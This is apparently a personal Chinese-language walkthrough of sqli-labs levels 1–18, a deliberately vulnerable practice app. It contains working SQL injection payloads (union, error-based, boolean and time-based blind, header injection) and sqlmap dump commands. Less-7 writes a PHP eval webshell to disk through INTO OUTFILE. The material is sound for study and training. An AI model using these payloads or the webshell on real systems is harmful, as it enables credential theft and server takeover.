sqli-labs-basic闯关纪录

sqli-labs-basic通关记录宝典

转载请标注原文链接:
https://www.cnblogs.com/HAN91/p/14927407.html
a


Less-1

date:2020-11-16 21:29:27

过程

根据题目提示:Please input the ID as parameter with numeric value ,注入点为id

sqlmap:

爆库:
py sqlmap.py -u http://www.sqli-labs.com/Less-1?id=1 --dbs --batch
爆表:
py sqlmap.py -u http://www.sqli-labs.com/Less-1?id=1 -D security --tables --batch
爆字段:
py sqlmap.py -u http://www.sqli-labs.com/Less-1?id=1 -D security -T users --columns --batch
爆字段值:
py sqlmap.py -u http://www.sqli-labs.com/Less-1?id=1 -D security -T users -C id,password,username --dump --batch

拿到数据,别的表同理:
Database: security
Table: users
[13 entries]
+----+------------+----------+
| id | password   | username |
+----+------------+----------+
| 1  | Dumb       | Dumb     |
| 2  | I-kill-you | Angelina |
| 3  | p@ssword   | Dummy    |
| 4  | crappy     | secure   |
| 5  | stupidity  | stupid   |
| 6  | genious    | superman |
| 7  | mob!le     | batman   |
| 8  | admin      | admin    |
| 9  | admin1     | admin1   |
| 10 | admin2     | admin2   |
| 11 | admin3     | admin3   |
| 12 | dumbo      | dhakkan  |
| 14 | admin4     | admin4   |
+----+------------+----------+

手工注入:

先小心翼翼地试一个id=1

http://www.sqli-labs.com/Less-1/
?id=1

哦豁,有数据回显

Your Login name:Dumb
Your Password:Dumb

用orderby试一下要几个字段,但是发现随便oderby都是一样的回显...

http://www.sqli-labs.com/Less-1/
?id=2 order by 110

中间试了好多都没有给回应,加单引号报错看一下sql语句,先入为主以为是数字型的了,明明题目也写了...蠢爆了!!!

http://www.sqli-labs.com/Less-1/
?id=1'
输出:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

orderby试出来是要三个字段,因为要闭合后面的单引号好麻烦就直接用#(URL编码%23)注释了后面的代码,自己搞

http://www.sqli-labs.com/Less-1/
?id=1' order by 3 limit 1 %23
输出:
Your Login name:Dumb
Your Password:Dumb

http://www.sqli-labs.com/Less-1/
?id=1' order by 4 limit 1 %23
输出:
Unknown column '4' in 'order clause'

三个字段,只输出了两个值,理所当然有一个id啦,所以第一个字段随便搞,后面两个字段用了输出我们要的数据,一套流程走

爆库,从mysql默认的数据库information_schema里找所有的数据,使用group_concat拼接:
http://www.sqli-labs.com/Less-1/
?id=666666' union select 1,database(),group_concat(schema_name) from information_schema.schemata %23
输出:
第二个字段是当前数据库security,第三个字段是输出localhost所有的数据库

爆表:
http://www.sqli-labs.com/Less-1/
?id=666666' union select 1,group_concat(table_name),3 from information_schema.tables where database()=table_schema %23
输出:
Your Login name:emails,referers,uagents,users
Your Password:3

爆字段:
http://www.sqli-labs.com/Less-1/
?id=666666' union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' %23
输出:
Your Login name:user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password
Your Password:3

爆字段值:
http://www.sqli-labs.com/Less-1/
?id=666666' union select 1,group_concat(concat_ws('--',id,username,password)),3 from users+%23
输出:
Your Login name:1--Dumb--Dumb,2--Angelina--I-kill-you,3--Dummy--p@ssword,4--secure--crappy,5--stupid--stupidity,6--superman--genious,7--batman--mob!le,8--admin--admin,9--admin1--admin1,10--admin2--admin2,11--admin3--admin3,12--dhakkan--dumbo,14--admin4--admin4
Your Password:3

总结

  1. 虽然我觉得闭合引号很麻烦,但是我就是还是想去试一下,直接在最后闭合就可以了,也不会报语法错
http://www.sqli-labs.com/Less-1/
?id=1" order by 3 "

​ 那为什么大家闭合的时候都喜欢用

?id=1' and '1'='1
  1. 画面感地理解一下函数

    concat_ws()是拼接一行的数据

    group_concat()是拼接一列的数据

  2. 因为sql学的就很菜,有些语法函数什么的还要百度,mysql里information_schema里的,很多表名和字段名经常搞混,手工注入的时候还要去看具体的表名和字段名,超级浪费时间的,可是记一下吧很久不写又忘记了,而且数据库那么多,默认的表都不一样,还是多写题8

  3. 跑sqlmap的时候,会给出相应的payload,有些写得真的超级复杂,说是为了绕过把,可是有个select就感觉绕不过去呀,等有一天我不再是一个连脚本都不会用的菜鸡了,有机会的话,想去研读一下源码


Less-2

data: 2020-11-17 10:32:43

过程

和less-1相比就是少闭合了两个引号罢了

sqlmap

同Less-1

手工注入

判断id是注入点且需要三个字段:

payload:http://www.sqli-labs.com/Less-2?id=1 order by 4
输出:Unknown column '4' in 'order clause'
payload:http://www.sqli-labs.com/Less-2?id=1 order by 3
输出:Your Login name:DumbYour Password:Dumb

和less-1一样一套流程:

爆库,第二个字段拼接改连接所有数据库名:
http://www.sqli-labs.com/Less-2?id=-1 union select 1,group_concat(schema_name),3 from information_schema.schemata
爆当前数据库的表:
http://www.sqli-labs.com/Less-2?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where database()=table_schema
爆字段:
http://www.sqli-labs.com/Less-2?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'
爆字段值:
http://www.sqli-labs.com/Less-2?id=-1 union select 1,group_concat(concat_ws('--',username,password)),3 from users

总结

呜呜呜,终于不用写什么都要看通关手册了


Less-3

date:2020-11-17 11:00:04

过程

sqlmap

同Less-1

手工注入

加单引号报错,看后面具体要闭合啥

payload:

http://www.sqli-labs.com/Less-3?id=1asdf'kkkk

输出,发现后面有括号啥的闭合一下,并且id也是字符型的:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'kkkk') LIMIT 0,1' at line 1

根据order by 判断需要的字段数是3个

payload:

http://www.sqli-labs.com/Less-3?id=-1') order by 4 --+http://www.sqli-labs.com/Less-3?id=-1') order by 3 --+

脱脱脱:

爆库,第二个字段拼接改连接所有数据库名:
http://www.sqli-labs.com/Less-3?id=-1') union select 1,group_concat(schema_name),3 from information_schema.schemata --+
爆当前数据库的表:
http://www.sqli-labs.com/Less-3?id=-1') union select 1,group_concat(table_name),3 from information_schema.tables where database()=table_schema --+
爆字段:
http://www.sqli-labs.com/Less-3?id=-1') union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
爆字段值:
http://www.sqli-labs.com/Less-3?id=-1') union select 1,group_concat(concat_ws('--',username,password)),3 from users --+

总结

?id=1"竟然正常返回信息了!!!

因为id=xx('1"')了啊,根本没闭合啊,有点弱智哦


Less-4

date:2020-11-17 11:25:45

过程

sqlmap

同Less-1

手工注入

发现双引号报错,所以可以直接在后面加 ") %23+ 进行闭合

payload:
http://www.sqli-labs.com/Less-4?id=1"
输出:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1

根据order by确定是三个字段后,union select拿数据

爆库,第二个字段拼接改连接所有数据库名:
http://www.sqli-labs.com/Less-4?id=-1") union select 1,group_concat(schema_name),3 from information_schema.schemata --+
爆当前数据库的表:
http://www.sqli-labs.com/Less-4?id=-1") union select 1,group_concat(table_name),3 from information_schema.tables where database()=table_schema --+
爆字段:
http://www.sqli-labs.com/Less-4?id=-1") union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users' --+
爆字段值:
http://www.sqli-labs.com/Less-4?id=-1") union select 1,group_concat(concat_ws('--',username,password)),3 from users --+

总结

没啥好说的


Less-5

date:2020-11-17 11:48:40

过程

sqlmap

同Less-1

手工注入

单引号报错,payload

payload:
http://www.sqli-labs.com/Less-5?id=1'
输出:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 0,1' at line 1

''1'' LIMIT 0,1'第一个单引号真的巨坑,总是眼糊看错成SQL语句里面的

闭合单引号,用order by确定是提取了三个字段,但是页面上并没有输出字段的值,目测是后台进行了判断

payload:
http://www.sqli-labs.com/Less-5?id=1' order by 3 +%23+
输出:
You are in...........

前端没有发现啥有用的东西,撸了一下floor报错,开干

爆库payload

http://www.sqli-labs.com/Less-5?id=1' AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT(database(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)AND '1'='1

然后像以前一样的流程,在concat里面找自己要的数据就好了

总结

  1. select count(*) from test group by floor(rand(0)*2)报错原理666

    概括一下:

    floor(rand(0)*2)是随机0、1,但是是伪随机011011...

    count(*)与group by共同工作时会建立一张虚拟表,两个字段(关键字和数量)

    floor表达式第一次运算的值为0,在表中没有找到key为0的数据,故插入,在插入的过程中需要再取一次group by后面的值(即再进行一次floor运算,结果为1),取到了1,将之插入,并将count(*)置1。

    也就是说一次插入要调用两次floor,所以在后面碰见01时,0没有,插入1,但是1已经存在,报错

  2. payload是sqlmap复制后修改的,自己手动输入的总是说有语法错,我对着看了好多遍感觉没有什么问题啊,无理取闹,后来看报错应该是and后面的select from的表要别名(Every derived table must have its own alias),select from外面还要加一个括号


Less-6

data: 2020-11-17 15:50:40

过程

sqlmap

同Less-1

手工注入

输入了less-5里面的payload,发现不报错了!

机智的我去看sqlmap发现就是变成了闭合双引号罢了唉,人傻了

爆当前库payload:

http://www.sqli-labs.com/Less-6?id=1" AND(SELECT 1 FROM(SELECT COUNT(*),CONCAT(database(),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)AND '1'="1

CONCAT(payload,floor(rand(0)*2))作为group by的key

总结

没啥好总结的,还以为又有新东西可以看了


Less-7

date:2020-11-17 16:09:39

过程

sqlmap

同Less-1

sqlmap用的时间盲注,它自己跑着跑着连接就断了,笑死

手工注入

试了一些,目测后台做了判断

sql报错统一输出:

You have an error in your SQL syntax

正常输出:You are in.... Use outfile......

盲注的话,二分法判断字符的ascii码值,sqlmap都说它扛不住了

看见正常输出那里有个use outfile......,感觉是个提示,新东西就要百度看看,好叭这里直接看通关秘籍了,竟然直接写入文件getshell了......

太帅了,动手撸一遍

要上传一句话连接的话,需要知道路径,去有回显的题拿路径啦

basedir 参数指定了安装 MySQL 的安装路径

datadir 参数指定了 MySQL 的数据库文件放在什么路径下

payload:

http://www.sqli-labs.com/Less-1/?id=-1' union select 1,@@datadir,@@basedir MYSQL %23+

输出,并没有phpstudy的路径,因为我根本没用phpstudy的数据库...:

Your Login name:C:\ProgramData\MySQL\MySQL Server 5.5\Data\Your Password:C:/Program Files (x86)/MySQL/MySQL Server 5.5/

尝试在获取到的路径下存入php一句话:

http://www.sqli-labs.com/Less-7/?id=1 union select '<?php eval(@_POST["haha"]); ?>' into outfile 'C:/ProgramData/MySQL/MySQL Server 5.5/Data/haha.php' %23+

但是一直报错,愤怒地直接去mysql运行的时候,发现报错:

[SQL] select '<?php eval(@_POST["haha"]); ?>' into outfile 'C:/haha.php'[Err] 1290 - The MySQL server is running with the --secure-file-priv option so it cannot execute this statement

去查了一下报错原因:

将桌面文件存储到mysql时报错:
The MySQL server is running with the --secure-file-pri option so it cannot execute this.
报错原因:
mysql文件的导入和导出路径有默认的设置,即 secure-file-priv,当传入的csv文件路径与默认的路径冲突时就会报错。secure-file-priv的值有三种情况:
  1. secure_file_prive=null ––限制mysqld 不允许导入导出
  2. secure_file_priv=/path/ – --限制mysqld的导入导出只能发生在默认的/path/目录下
  3. secure_file_priv=’’ – --不对mysqld 的导入、导出做限制

通过命令 select @@secure_file_priv 查询,发现secure_file_priv的值为null,也就是说不允许导入导出

于是到mysql的安装目录下修改my.ini配置文件,在mysqld节点下加入secure_file_priv='',对导入导出不进行限制

在尝试payload时,

?id=1 order by 111111 %23+不报错

?id=1' order by 111111 %23+报错

?id=1" order by 111111 %23+不报错

说明有一个单引号要闭合

?id=1' order by 1 %23+报错

?id=1')) order by 3 %23+不报错

?id=1')) order by 4 %23+报错

闭合成功,且需要三个字段

payload:

http://www.sqli-labs.com/Less-7?id=1')) union select '<?php @eval($_POST["haha"]); ?>',2,3 into outfile 'D:/haha.php' %23+

虽然输出还是报错,但是文件已经上传到D盘了(因为这个sql语句我已经在数据库试了很多遍了...)

但是因为我的mysql不是PHPstudy的,所以没有通过路径回显搞到phpstudy的路径,没有上传到phpstudy目录下,也连接不上解析不了?

机智的我决定手动复制到www下

上蚁剑连接成功

另外要看数据库数据的话可以通过改上面的p输出文件,然后上蚁剑查看输出的文件内容,其余的爆数据库和之前的题目都一样的流程,例如爆当前数据库名:

http://www.sqli-labs.com/Less-7?id=1')) union select database(),2,3 into outfile 'D:/haha.php' %23+

因为用命令行登录数据库需要密码

总结

  1. MySQL的@与@@区别

    @x 是 用户自定义的变量 (User variables are written as @var_name)

    @@x 是 global或session变量 (@@global @@session )

  2. 菜鸡的悲哀就是做个题还要靠作弊,但是神交给我的任务就是做完并学会它!


Less-8

date:2020-11-21 13:58:47

过程

sqlmap

同less-1,看见sqlmap的payload,它也是盲注咯

手工注入

单引号闭合后分别order by 3和4,发现一个正常输出一个不输出,说明单引号闭合成功,order by执行成功,且需要三个字段,payload:

http://www.sqli-labs.com/Less-8?id=1' order by 3 %23+http://www.sqli-labs.com/Less-8?id=1' order by 4 %23+

没有回显数据,只能盲注

尝试第七关的outfile上传文件,上传成功,上蚁剑连接

换个思路,上盲注,看题目是布尔盲注,一个一个猜呗,机智的我决定先测试出长度再上bp爆

length()函数,显而易见是返回里面参数的长度

substr(a,b,c)函数,显而易见是截断字符串a,b位置开始截取c个字符

payload:

http://www.sqli-labs.com/Less-8?id=1' and (select length(database()))=8 %23+

=8时正常输出,说明当前数据库名字长度为8

上bp, 选中Intruder

攻击模式可以选sniper也可以选clusterbomb,都很方便,字典直接用excel下拉到127的...,一个一个打也太费劲了把(哈哈哈,发现原来bp有自带的数字字典,尴尬极了ヾ(=゚・゚=)ノ喵♪)

从1到127一个一个猜数据库名中的字符,根据返回数据的长度不同找到正确的ascii码值:

GET /Less-8/?id=1%27%20and%20(select%20ascii(substr(database(),§1§,1)))=§115§%20%23+ HTTP/1.1
Host: www.sqli-labs.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflateDNT: 1
Connection: keep-alive
Upgrade-Insecure-Requests: 1
Pragma: no-cacheCache-Control: no-cache

这里就不上bp图了,不好搞,用的笛卡尔乘积,发了一千多个请求就爆了个当前数据库名,要爆别的在上面payload改改完事:

request payload1 payload2 status timeout error length
0 200 false false 950
787 3 99 200 false false 950
802 2 101 200 false false 950
838 6 105 200 false false 950
909 5 114 200 false false 950
913 1 115 200 false false 950
927 7 116 200 false false 950
932 4 117 200 false false 950
968 8 121 200 false false 950
1 1 1 200 false false 966
2 2 1 200 false false 966
3 3 1 200 false false 966
4 4 1 200 false false 966
5 5 1 200 false false 966
6 6 1 200 false false 966

总结

盲注一个个手打的话就是很费时间,疲惫

有sqlmap真好


Less-9

date:2020-11-21 15:10:01

过程

sqlmap

同less-1

手工注入

不管输入什么都是正常输出,明明输入的id数据库里面就没有,还说you are in,用户体验差评:

Welcome    DhakkanYou are in...........

利用 if() 函数进行时间盲注,发现闭合单引号的时候它就一直sleep了

payload:

http://www.sqli-labs.com/Less-9?id=1' and if((1=2),1,sleep(2333)) %23

和布尔盲注类似,但是是根据服务器响应的时间长短进行判断了,开干

payload:

http://www.sqli-labs.com/Less-9?id=1' and if((length(database())=8),sleep(2333),1) %23

判断出database()的长度是8个字符,还是接着上bp:

GET /Less-9/?id=1%27%20and%20if((ascii(substr(database(),§1§,1))=§115§),sleep(11),1)%20%23 HTTP/1.1Host: www.sqli-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateDNT: 1Connection: keep-aliveUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cache

bp的result,根据ascii值就可以吧当前数据名弄出来了:

request payload1 payload2 status timeout error length
0 200 false false 988
787 3 99 200 false false 988
802 2 101 200 false false 988
838 6 105 200 false false 988
909 5 114 200 false false 988
913 1 115 200 false false 988
927 7 116 200 false false 988
932 4 117 200 false false 988
968 8 121 200 false false 988
1 1 1 200 false false 951
2 2 1 200 false false 951
3 3 1 200 false false 951
4 4 1 200 false false 951

总结

其实想节省时间可以去看数据库的命名规范,确定要测试的字符有哪些,这样在进行大量数据测试的时候会节省一些时间


Less-10

date:2020-11-21 15:55:10

过程

sqlmap

同less-1

手工注入

和less-9相比就是单引号闭合变成了双引号闭合

用这个payload,服务器就睡觉啦:

http://www.sqli-labs.com/Less-10?id=1" and if((1=1),sleep(2333),1) %23+

后面的流程和less-9一样

总结

遇到这个题目也不知道是该开心还是该开心


Less-11

date:2020-11-21 16:23:25

过程

写完时间盲注的我,看见这道题目,眼前一亮!终于换题目啦哈哈哈哈哈哈哈嗝

sqlmap

sqlmap测post请求可以用参数forms

这里用的--forms参数,直接搞到所有数据库了:

py sqlmap.py -u http://www.sqli-labs.com/Less-11 --forms --dbs --batch

后面爆字段值改参数就可以了,同less-1

手工注入

看见登录框就想admin/123456登录(竟然失败了!气人!)

抓包看见的是post请求,所以不能和之前一样直接在url后面接参数了,那就在输入框直接注入哈哈哈

payload,username最后面有个空格,不加空格注释符号和后面的符号连接在一起,就起不到注释的功能啦:

Username :    admin' or 1=1 -- Password :    123456

输出:

Your Login name:DumbYour Password:Dumb

有数据回显,舒服了

上bp抓包,直接改后面的参数,根据order by确定需要两个字段:

POST /Less-11/ HTTP/1.1Host: www.sqli-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://www.sqli-labs.com/Less-11/Content-Type: application/x-www-form-urlencodedContent-Length: 51Origin: http://www.sqli-labs.comDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cacheuname=admin%27 order by 2+--+&passwd=&submit=Submit

输出,竟然真的有一个admin/admin...:

<br>Your Login name:admin<br>Your Password:admin<br>

爆数据库payload:

uname=zhatian%27 union select 1,group_concat(schema_name) from information_schema.schemata+--+&passwd=&submit=Submit

输出:

<br>Your Login name:1<br>Your Password:information_schema,bookstore,challenges,dvwa,edusys,exam,fresh,hotel,hy,hy2,mysql,news,pentest,performance_schema,pikachu,security,store,student,test,vote<br>

爆表payload:

uname=zhatian%27 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()+--+&passwd=&submit=Submit

输出:

<br>Your Login name:1<br>Your Password:emails,referers,uagents,users<br

爆字段:

uname=zhatian%27 union select 1,group_concat(column_name) from information_schema.columns where table_name='users'+--+&passwd=&submit=Submit

输出:

<br>Your Login name:1<br>Your Password:user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password,level,id,username,password<br>

爆字段值:

uname=zhatian%27 union select 1,group_concat(concat_ws('--',username,password)) from users +--+&passwd=&submit=Submit

输出:

<br>Your Login name:1<br>Your Password:Dumb--Dumb,Angelina--I-kill-you,Dummy--p@ssword,secure--crappy,stupid--stupidity,superman--genious,batman--mob!le,admin--admin,admin1--admin1,admin2--admin2,admin3--admin3,dhakkan--dumbo,admin4--admin4<br

后面的都是常规操作了

总结

sqlmap测post请求可以用参数forms,直接获取表单,可以使用-r参数读取请求文件,或者通过--data参数测试,具体情况具体百度

-r读取的文件可以用bp抓包,右键copy to file,直接导出txt文件


Less-12

过程

date:2020-11-21 17:21:22

sqlmap

同less-11

手工注入

上bp抓包

发现双引号报错,payload:

uname=admin"+or+1%3D1+--+&passwd=1234&submit=Submit

输出:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

我???

生气的乱搞了:

uname=admin"5678+or+1%3D1+--+&passwd=1234&submit=Submit

输出:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '5678 or 1=1 -- ") and password=("1234") LIMIT 0,1' at line 1

这下出来了把,后面是"),再加个括号闭合一下下,分别order by2和3,确定是两个字段

uname=admin123455")+order by 3--+&passwd=1234&submit=Submit

输出当前数据库~

uname=admin123455")+union select 1,database()--+&passwd=1234&submit=Submit

输出:

<br>Your Login name:1<br>Your Password:security<br>

后续操作参考less-11

总结

和上一关比就是单引号闭合变成")闭合了,和前面十关做的题目一样呀,后面不会还是一样的吧,然后写完盲注就没了把

唉,我觉得我的专注力有点不太够,才写了几道题啊,还花了这么长时间,真是废物


Less-13

date:2020-11-21 18:08:01

过程

sqlmap

同less-11

手工注入

盲猜这题是 ')) 闭合,payload:

uname=admin%27%29%29+or+1%3D1+--+23&passwd=32&submit=Submit

输出:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') or 1=1 -- 23') and password=('32') LIMIT 0,1' at line 1

哦豁,是 ') 闭合,生气!闭合:

uname=admin') or 1=1+--+23&passwd=32&submit=Submit

输出只有一张图片,表示闭合成功,没有数据回显

那就用报错来看数据呗,正好报错注入的函数我用的少

extractvalue(目标xml文档,xml路径)用于查询xml文件

第二个参数 xml中的位置是可操作的地方,xml文档中查找字符位置是用 /xxx/xxx/xxx/…这种格式,如果我们写入其他格式,就会报错,并且会返回我们写入的非法格式内容,而这个非法的内容就是我们想要查询的内容

payload:

uname=admin') and extractvalue(1,concat('~',database()))+--+23&passwd=32&submit=Submit

输出得到当前数据库名:

XPATH syntax error: '~security

拿别的数据在xml路径那里改payload即可,参考less-11

总结

十种sql报错注入姿势总结


Less-14

date:2020-11-21 19:47:21

过程

sqlmap

同less-11

手工注入

直接双引号闭合了,payload:

uname=admin" order by 666+--+&passwd=123&submit=Submit

输出:

Unknown column '666' in 'order clause'

能闭合了就随便用之前的哪个方法拿数据都可以啦,用报错注入拿个数据库名:

uname=admin" and extractvalue(1,concat('~',database()))+--+&passwd=123&submit=Submit

输出:

XPATH syntax error: '~security'

别的同Less-11

总结

这,没啥


Less-15

date:2020-11-21 20:03:27

过程

sqlmap

同less-11

手工注入

看标题,布尔盲注,行叭,上bp抓包

单引号闭合后接order by 2,给的是flag.jpg

接order by 2,给的是slap.jpg

明显flag.jpg的就是登陆成功嘛

说明单引号闭合成功且需要的是两个字段:

uname=admin' order by 3+--+&passwd=&submit=Submit

还是先利用if判断,把数据库名字长度搞出来,利用一下payload,服务器沉睡了好一会才醒来,那么长度就是8啦!

uname=admin' and if( length(database())=8,sleep(23),1 )+--+&passwd=&submit=Submit

一个一个字符猜,这种搬砖的活还是交给bp把

右键send to Intruder,attack type选cluster bomb:

POST /Less-15/ HTTP/1.1Host: www.sqli-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://www.sqli-labs.com/Less-15/Content-Type: application/x-www-form-urlencodedContent-Length: 81Origin: http://www.sqli-labs.comDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cacheuname=admin' and if( ascii(substr(database(),§1§,1))=§8§,sleep(23),1 )+--+&passwd=&submit=Submit

第一个参数从1-8,第二个参数从1-127,最后根据ascii值把数据库名拖出来,爆字段参考less-11

request payload1 payload2 status timeout error length
787 3 99 200 false false 1691
802 2 101 200 false false 1691
838 6 105 200 false false 1691
909 5 114 200 false false 1691
913 1 115 200 false false 1691
927 7 116 200 false false 1691
932 4 117 200 false false 1691
968 8 121 200 false false 1691
0 200 false false 1737
2 2 1 200 false false 1737
1 1 1 200 false false 1737
3 3 1 200 false false 1737

总结


Less-16

date:2020-11-21 22:33:47

过程

sqlmap

同less-11

手工注入

username输入admin") or 1=1 -- 直接登录成功,不要忘记--后面的空格哈

因为可以根据图片的显示判断,所以其实时间盲注还是布尔盲注都是可以的呀,只是前面那道题用过布尔盲注了,这里就用时间盲注

老规矩先判断数据库长度是8:

admin") and length(database())=8 -- 

然后搬砖找bp,send to Intruder:

POST /Less-16/ HTTP/1.1Host: www.sqli-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://www.sqli-labs.com/Less-16/Content-Type: application/x-www-form-urlencodedContent-Length: 78Origin: http://www.sqli-labs.comDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cacheunameadmin") and if(ascii(substr(database(),§1§,1))=§8§,slepp(23),1)--+&passwd=&submit=Submit

第一个参数从1-8,第二个参数从1-127,最后根据ascii值把数据库名拖出来,爆字段参考less-11

request payload1 payload2 status timeout error length
787 3 99 200 false false 1712
802 2 101 200 false false 1712
838 6 105 200 false false 1712
909 5 114 200 false false 1712
913 1 115 200 false false 1712
927 7 116 200 false false 1712
932 4 117 200 false false 1712
968 8 121 200 false false 1712
0 200 false false 1749
1 1 1 200 false false 1749

总结

bp真好,sqlmap真好,搬砖真难


Less-17(sqlmaping)

date:2020-11-21 22:54:56

过程

看见题目又开心了起来,不是盲注啦

sqlmapbp抓包右键copy to file生成17.txt

python sqlmap.py -r 17.txt --risk=3 --dbs --batch

后续同less-11

手工注入

username输入admin' or 1=1 --

竟然返回bug off,you silly dump hacker

哦豁,骂我,我要干你,等着

我怀疑后台判断了用户输入,然后无数次尝试无数次被骂,我决定偷偷看一下源码

源码中对uname限制了只能15个字符,单是这个就已经很无力了,后来看完源码才发现这是一个重置密码的表单,而且源码中并没有对passwd做限制

眼瞎的我决定用时间盲注,bp send to repeater:

uname=admin&passwd=1' where 1=1 and if( length(database())=8,sleep(10),1 )--+&submit=Submit

哈哈 服务器睡着啦,随后时间盲注就可以了,和上面的题目一样

总结

感觉用得多的还是盲注

盲注手工注入最快就是用二分法,但是我是有bp的人!

  1. --risk=RISK 风险(1-4,默认1)升高风险等级会增加数据被篡改的风险。risk 2:基于事件的测试;risk 3:or语句的测试;risk 4:update的测试

Less-18

date:2020-11-22 00:19:07

过程

题目提示,Your IP ADDRESS is: 127.0.0.1,这题我会!肯定是xff头注入!(结果不是)

sqlmap

bp抓包右键copy to file生成18.txt

python sqlmap.py -r 18.txt --level=5 --risk=3 --dbs --batch

后续同less-11

手工注入

既然不是xff头,那就看一下源码把

源码中对账户密码进行了判断,必须要绕过去才能进行头注入,刚好上一题重置了密码

那么就输入相应的账户密码,再在user-agent上注入就好啦,先来个单引号报错:

POST /Less-18/ HTTP/1.1Host: www.sqli-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://www.sqli-labs.com/Less-18/Content-Type: application/x-www-form-urlencodedContent-Length: 34Origin: http://www.sqli-labs.comDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cacheuname=admin&passwd=1&submit=Submit

输出:

<br>Your IP ADDRESS is: 127.0.0.1<br><font color= "#FFFF00" font size = 3 ></font><font color= "#0000ff" font size = 3 >Your User Agent is: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0'</font><br>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '127.0.0.1', 'admin')' at line 1<br><br><img src="../images/flag.jpg"  /><br>

讲道理这里肯定是插入操作,那就是insert注入咯,源码确实是insert,其实不管是什么注入,只要能大概弄sql语句,顺利让数据库执行我们的代码即可

拿database()这里利用报错注入,payload:

POST /Less-18/ HTTP/1.1Host: www.sqli-labs.comUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0',1,extractvalue(1,concat('~',database())))# Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://www.sqli-labs.com/Less-18/Content-Type: application/x-www-form-urlencodedContent-Length: 34Origin: http://www.sqli-labs.comDNT: 1Connection: closeUpgrade-Insecure-Requests: 1Pragma: no-cacheCache-Control: no-cacheuname=admin&passwd=1&submit=Submit

输出,拿到当前数据库security:

<br>Your IP ADDRESS is: 127.0.0.1<br><font color= "#FFFF00" font size = 3 ></font><font color= "#0000ff" font size = 3 >Your User Agent is: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:83.0) Gecko/20100101 Firefox/83.0',1,extractvalue(1,concat('~',database())))#</font><br>XPATH syntax error: '~security'<br><br><img src="../images/flag.jpg"  /><br>

后面爆字段值同less-11,改一下payload即可

总结

看源码,就像考试作弊,心怀愧疚(跃跃欲试)

  1. level参数:

1>探测等级: --level 5

--level 5 指的是需要执行的测试等级

